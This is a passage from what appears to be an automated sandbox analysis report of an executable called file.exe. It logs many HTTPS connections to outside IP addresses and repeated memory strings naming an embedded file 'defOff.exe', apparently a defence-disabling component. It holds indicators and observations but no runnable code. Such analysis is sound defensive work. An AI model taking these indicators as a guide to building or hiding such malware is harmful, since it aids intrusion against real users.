              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.204.130.19:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.204.130.19:443 -> 192.168.2.4:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49818 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.1983935513.0000000005875000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2015410188.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013647421.00000000051FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986452063.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982247576.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994481612.00000000059FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982433970.00000000058FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987551338.00000000057C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986184404.000000000588E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991302781.00000000057B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980474452.0000000005860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001603197.00000000058FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987860470.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988027791.00000000058B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989956716.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984529703.0000000005880000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985889010.0000000005895000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001956769.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986959768.0000000005894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995209333.00000000058E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989391247.00000000058C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1983113359.0000000005874000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2002124522.00000000058F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981609011.00000000057BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988303660.00000000057C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986817547.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2002302231.0000000005A36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982337966.0000000005857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985608305.000000000595A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988465676.00000000058B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986587792.00000000058A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996696446.00000000058E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987102699.0000000005981000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981884420.0000000005860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982627515.000000000586F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987397681.00000000058AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2000474903.00000000058F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984198444.000000000587C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985237490.0000000005960000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982066958.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989822844.00000000058D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982922466.000000000591E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995583843.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986322681.000000000596D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991157842.00000000059ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001795744.0000000005A4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980390374.00000000057C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984763315.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1999373888.00000000057BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982157116.0000000005911000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985738612.00000000057C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985358923.00000000057B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981703171.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980039989.0000000005418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001390011.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991439687.00000000058D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013741117.00000000051D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985120070.0000000005884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982529184.00000000057BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989669119.00000000057B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994066669.00000000058D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013612910.0000000005282000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988950332.00000000057BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
